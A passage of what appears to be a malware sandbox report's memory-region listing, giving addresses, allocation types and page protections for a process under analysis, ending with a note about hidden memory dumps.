page read and write
|
||
|
21AD0000
|
direct allocation
|
page read and write
|
||
|
4DAD000
|
remote allocation
|
page execute and read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
6327000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
267AFB00000
|
heap
|
page read and write
|
||
|
267C042C000
|
trusted library allocation
|
page read and write
|
||
|
4DB8000
|
heap
|
page read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
2226C000
|
heap
|
page read and write
|
||
|
267C8331000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
8840000
|
direct allocation
|
page read and write
|
||
|
81AD000
|
stack
|
page read and write
|
||
|
22000000
|
heap
|
page read and write
|
||
|
2EE5000
|
heap
|
page read and write
|
||
|
267B0141000
|
trusted library allocation
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
267B05DF000
|
trusted library allocation
|
page read and write
|
||
|
219CE000
|
stack
|
page read and write
|
||
|
D3B7DF7000
|
stack
|
page read and write
|
||
|
2E2C000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
46BD000
|
heap
|
page read and write
|
||
|
222A0000
|
heap
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
267C8322000
|
heap
|
page read and write
|
||
|
28CD000
|
stack
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
4675000
|
heap
|
page read and write
|
||
|
267AFA10000
|
trusted library allocation
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
212B0000
|
direct allocation
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
21D6C000
|
stack
|
page read and write
|
||
|
21D2C000
|
stack
|
page read and write
|
||
|
599B000
|
trusted library allocation
|
page read and write
|
||
|
2A5C000
|
stack
|
page read and write
|
||
|
267C83A9000
|
heap
|
page read and write
|
||
|
468C000
|
heap
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
4880000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E61000
|
heap
|
page read and write
|
||
|
267AE088000
|
heap
|
page read and write
|
||
|
22813000
|
unclassified section
|
page execute and read and write
|
||
|
212D0000
|
direct allocation
|
page read and write
|
||
|
21F20000
|
unclassified section
|
page execute and read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
267AF967000
|
heap
|
page read and write
|
||
|
31BE000
|
unkown
|
page read and write
|
||
|
4687000
|
heap
|
page read and write
|
||
|
227A0000
|
unclassified section
|
page execute and read and write
|
||
|
33EF000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
4DB8000
|
heap
|
page read and write
|
||
|
46F9000
|
heap
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
267B0130000
|
heap
|
page execute and read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
267B0D26000
|
trusted library allocation
|
page read and write
|
||
|
21F66000
|
direct allocation
|
page execute and read and write
|
||
|
3224000
|
heap
|
page read and write
|
||
|
AECD000
|
direct allocation
|
page execute and read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
267B0D50000
|
trusted library allocation
|
page read and write
|
||
|
4684000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
267B0D41000
|
trusted library allocation
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B5000
|
trusted library allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
6230000
|
direct allocation
|
page read and write
|
||
|
22096000
|
heap
|
page read and write
|
||
|
4691000
|
heap
|
page read and write
|
||
|
267B00B0000
|
heap
|
page read and write
|
||
|
21C50000
|
remote allocation
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
633E000
|
heap
|
page read and write
|
||
|
2226C000
|
heap
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
2198D000
|
stack
|
page read and write
|
||
|
267AF970000
|
heap
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
46C9000
|
heap
|
page read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
21350000
|
direct allocation
|
page read and write
|
||
|
D3B80FE000
|
stack
|
page read and write
|
||
|
4980000
|
heap
|
page read and write
|
||
|
D3B7BFB000
|
stack
|
page read and write
|
||
|
21A0F000
|
stack
|
page read and write
|
||
|
631E000
|
heap
|
page read and write
|
||
|
59A1000
|
trusted library allocation
|
page read and write
|
||
|
5991000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
267AFFB0000
|
heap
|
page read and write
|
||
|
4686000
|
heap
|
page read and write
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
23E0000
|
direct allocation
|
page read and write
|
||
|
228A0000
|
heap
|
page read and write
|
||
|
267B036C000
|
trusted library allocation
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
A4CD000
|
direct allocation
|
page execute and read and write
|
||
|
57AD000
|
remote allocation
|
page execute and read and write
|
||
|
73E1000
|
heap
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
7448000
|
trusted library allocation
|
page read and write
|
||
|
267C8420000
|
heap
|
page read and write
|
||
|
D3B7AFD000
|
stack
|
page read and write
|
||
|
223D0000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page execute and read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
267B05C1000
|
trusted library allocation
|
page read and write
|
||
|
4671000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
21EAD000
|
stack
|
page read and write
|
||
|
4683000
|
heap
|
page read and write
|
||
|
267AFAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21C0D000
|
stack
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
2C33000
|
heap
|
page read and write
|
||
|
856C000
|
stack
|
page read and write
|
||
|
35FE000
|
stack
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
2D8E000
|
stack
|
page read and write
|
||
|
2F24000
|
trusted library allocation
|
page read and write
|
||
|
2CCE000
|
stack
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
22100000
|
heap
|
page read and write
|
||
|
267B0D3A000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
direct allocation
|
page read and write
|
||
|
4991000
|
trusted library allocation
|
page read and write
|
||
|
81F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
6F3D000
|
stack
|
page read and write
|
||
|
267B1EDB000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
trusted library allocation
|
page read and write
|
||
|
483C000
|
stack
|
page read and write
|
||
|
25ED000
|
stack
|
page read and write
|
||
|
64D6000
|
heap
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
779C000
|
stack
|
page read and write
|
||
|
216E0000
|
heap
|
page read and write
|
There are 735 hidden memdumps, click here to show them.